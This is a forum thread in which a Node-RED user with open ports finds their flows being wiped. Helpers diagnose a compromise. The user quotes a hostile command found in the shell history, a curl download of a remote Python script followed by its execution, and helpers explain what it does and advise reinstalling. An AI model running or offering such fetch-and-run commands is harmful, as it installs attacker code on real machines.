Flows disappear after a few hours!

I'm very bad at this.
Have managed to install Node-Red and a MQTT on my ROCK 4 SE card with Debian 11. The installation took place in January 2023. Got nice Flows connected to my IOTs. Everything has worked great until now.
My Flows just disappeared. Putting them back, import and then after about 24 hours they are gone again. Nothing else stops working but only Flows in Node-Red disappear. Node-Red works fine but is missing all my constructed Flows.

Tried to search and read and somewhere they say that the problem is that the creation of Flows ends up stored only in memory, not on the memory card I use as storage and OS.
Could that be the problem or what could it be?

I don't understand how I can control this, and if so, not fix it either.
Please can you help me solve the problem pedagogically?

As I said, I'm really bad with Linux, but it's fun to tinker :slight_smile:

Ola A. , Sweden

Are you using Docker?

Stop node red and start it again in a command window. Post the full output from the start command. It should start with the Welcome to node red message. Copy/paste please, not screenshot.

Hello :slightly_smiling_face:
What is Docker?
Attached is a txt-file with the startlogg text.

Thank you so much!
Startlogg_Node-red_OlaA_231010_854.txt (2.9 KB)

I would have thought that your favourite search engine would have answered that in seconds, but it doesn't matter because if you don't know then you are not using it.

Please in future paste logs directly into a reply, I don't want my phone downloads littered with such things.

The only unusual thing I can see is that it appears that node-red-contrib-googlehome-actions-v2 conflicts with node-red-contrib-googlehome-actions-v2-piyanggoon which probably isn't surprising. You should uninstall one of those. That is not likely to be the cause of the problem, but you should fix it first anyway. Always fix problems you understand first, even if you think it is nothing to do with issue you are investigating.

If you power the machine down, wait 30 seconds (I assume it is not battery backed) and then restart, is it ok? If it is then the flows must be stored on permanent storage, not RAM.

After it fails next time, look in /var/log/syslog for the node-red messages and see what it says. You can do that using
grep -i "node-red" /var/log/syslog
or if it has moved on to another syslog, then
grep -i "node-red" /var/log/syslog.1

OK I try to uninstall google home actions... And power it down.

Thanks :slight_smile:

Did as you said and shut down the computer completely for approx. 15 minutes Everything then works normally until 17:00 when everything is suddenly gone again, only Flow. Added Nodes are available as usual.
Tried your commands but they don't work, just get:

ola_a@B75-mqtt:~$ grep -i "node-red" /var/log/syslog
grep: /var/log/syslog: No such file or directory
ola_a@B75-mqtt:~$ -i "node-red" /var/log/syslog
bash: -i: command not found

ola_a@B75-mqtt:~$ grep -i "node-red" /var/log/syslog.1
grep: /var/log/syslog.1: No such file or directory

Here is a Node red log:
You can see when I recreated flow in the morning. Then at 17:48 something happens. That's when everything disappears.

Oct 30 08:52:41 - [info] |
Oct 30 08:52:41 - [info] | Installed packages:
30 Oct 08:52:41 - [info] +----------------------------------- ---------------
30 Oct 08:52:41 - [info] Starting flows
30 Oct 08:52:41 - [info] Started flows
30 Oct 08:52:42 - [info] [mqtt-broker:B75-MQTT] Connected to broker: mqtt://B75-MQTT:1883
30 Oct 11:40:23 - [info] Uninstalling module: node-red-contrib-googlehome-actions-v2-piyanggoon
30 Oct 11:40:30 - [info] Uninstalled module: node-red-contrib-googlehome-actions-v2-piyanggoon
30 Oct 11:40:30 - [info] Removed node types:
30 Oct 11:40:30 - [info] - node-red-contrib-googlehome-actions-v2-piyanggoon:googlehome-controller
30 Oct 11:40:30 - [info] - node-red-contrib-googlehome-actions-v2-piyanggoon:googlehome-intent
30 Oct 11:40:30 - [info] - node-red-contrib-googlehome-actions-v2-piyanggoon:googlehome-ask
30 Oct 11:40:30 - [info] - node-red-contrib-googlehome-actions-v2-piyanggoon:googlehome-send
30 Oct 11:40:30 - [info] - node-red-contrib-googlehome-actions-v2-piyanggoon:googlehome-message
30 Oct 11:40:49 - [info] Stopping flows
30 Oct 11:40:49 - [info] Stopped flows
30 Oct 11:40:49 - [info] Updated flows
30 Oct 11:40:49 - [info] Starting flows
30 Oct 11:40:49 - [info] Started flows
30 Oct 11:40:49 - [info] [mqtt-broker:B75-MQTT] Connected to broker: mqtt://B75-MQTT:1883
30 Oct 17:48:36 - [info] Stopping modified flows
30 Oct 17:48:36 - [info] Stopped modified flows
30 Oct 17:48:36 - [info] Updated flows
30 Oct 17:48:36 - [info] Starting modified flows
30 Oct 17:48:36 - [info] Started modified flows

Found this mysterious command. What could it be, virus?
ola_a@B75-mqtt:~$ curl -O https://files.catbox.moe/0z2jmi.py && python3 0z2jmi.py

Here are today's stops and starts.
Started Node-RED graphical event wiring tool.
31 Oct 07:37:42 - [info]
Welcome to Node-RED

31 Oct 07:37:42 - [info] Node-RED version: v3.0.2
31 Oct 07:37:42 - [info] Node.js version: v16.19.0
31 Oct 07:37:42 - [info] Linux 4.4.194-11-rk3399-rockchip-g1bb08d49cc40 arm64 LE
31 Oct 07:37:43 - [info] Loading palette nodes
31 Oct 07:37:53 - [info] Dashboard version 3.2.3 started at /ui
31 Oct 07:37:54 - [warn] rpi-gpio : Raspberry Pi specific node set inactive
31 Oct 07:37:54 - [info] Settings file : /home/ola_a/.node-red/settings.js
31 Oct 07:37:54 - [info] Context store : 'default' [module=memory]
31 Oct 07:37:54 - [info] User directory : /home/ola_a/.node-red
31 Oct 07:37:54 - [warn] Projects disabled : editorTheme.projects.enabled=false
31 Oct 07:37:54 - [info] Flows file : /home/ola_a/.node-red/flows.json
31 Oct 07:37:54 - [info] Server now running at
31 Oct 07:37:54 - [warn]

Your flow credentials file is encrypted using a system-generated key.
If the system-generated key is lost for any reason, your credentials
file will not be recoverable, you will have to delete it and re-enter
your credentials.
You should set your own key using the 'credentialSecret' option
your settings file. Node-RED will then re-encrypt your credentials
file using your chosen key the next time you deploy a change.

31 Oct 07:37:54 - [info] +----------------------------------- ---------------
Oct 31 07:37:54 - [info] | uibuilder v6.0.0 initialised
Oct 31 07:37:54 - [info] | root folder: /home/ola_a/.node-red/uibuilder
Oct 31 07:37:54 - [info] | Using Node-RED's web server at:
Oct 31 07:37:54 - [info] |
Oct 31 07:37:54 - [info] | Installed packages:
31 Oct 07:37:54 - [info] +----------------------------------- ---------------
31 Oct 07:37:54 - [info] Starting flows
31 Oct 07:37:54 - [info] Started flows

It probably means that you have been hacked. Have you opened ports to allow access to node red from the Internet? Shut the machine down immediately before more damage is caused.

Where did you find that command?

In connection with the command interpreter, you can go back to previous commands with the arrows when it appeared.
Are there any antivirus programs for Linux?

You didn't answer the question:

If you have, and have not paid attention to preventing hackers getting in via node-red, then no virus protection would help.
See Safely accessing Node-RED over the Internet

Yes, I have ports open, two for my outdoors IOT to be able to talk to my Mosquitto broker and to be able to look at Node-Red data.
If you read online, you apparently use Python in connection with MQTT, so I wonder if Node-Red uses Python to communicate with Mosquitto.
I have closed the gates now.

No. If you are referring to the strange curl command you found, it is downloading a python script and then running it. The script presumably does the damage.

1 Like

Too late now but if you have devices outside your home LAN, it's probably best to use a cloud based MQTT broker (with a password too complicated to guess/remember).

I'm pretty sure though that it would be the Node-red port that was used to attack you.

It's not exactly more secure but if your port forwarding maps a very high external port number eg 61357 to 1880 you are much less likely to be spotted by port scanners.

I downloaded that script, or maybe another one someone posted. Just a couple of lines.
It downloads and runs another script (from a server which my PiHole disallows acess to).

1 Like

Have you powered the machine down, or at least isolated it from the network? Once into that machine the hackers have access to your local network, so other machines on the network might be affected. We have not seen any instances where that has been shown to have happened, but it is possible.

OK. Have closed the gates now. Will see what happens after 17:00 tonight. Otherwise I put back a backup I have since the start in januari installation. I will come back tomorrow.

Whatever happens, you must wipe the disc/card and re-install the OS. That is the only way you will know that you have cleared everything out.

OK And virus software for Linux?

Did you try a google search?

Yes of course, Naturally, I ask to get some good tips on good software that people have experience with. You couldn't have suggested someone good!?

I 00go'd it.

Since my Node-red machine is command line only, my current PC antivirus, and most mainstream alternatives are disqualified.
Which seemed to leave ClamAV which I was able to install on a new installation of RPiOS using the command line.

I considered enabling my router's guest network with isolation, port forwarding 1880 to that Pi, specifying a static IP & Google DNS server and watching what happened. It seemed like a lot of trouble, and would my router be safe?

But would the AV detect this malware's initial activity?

1 Like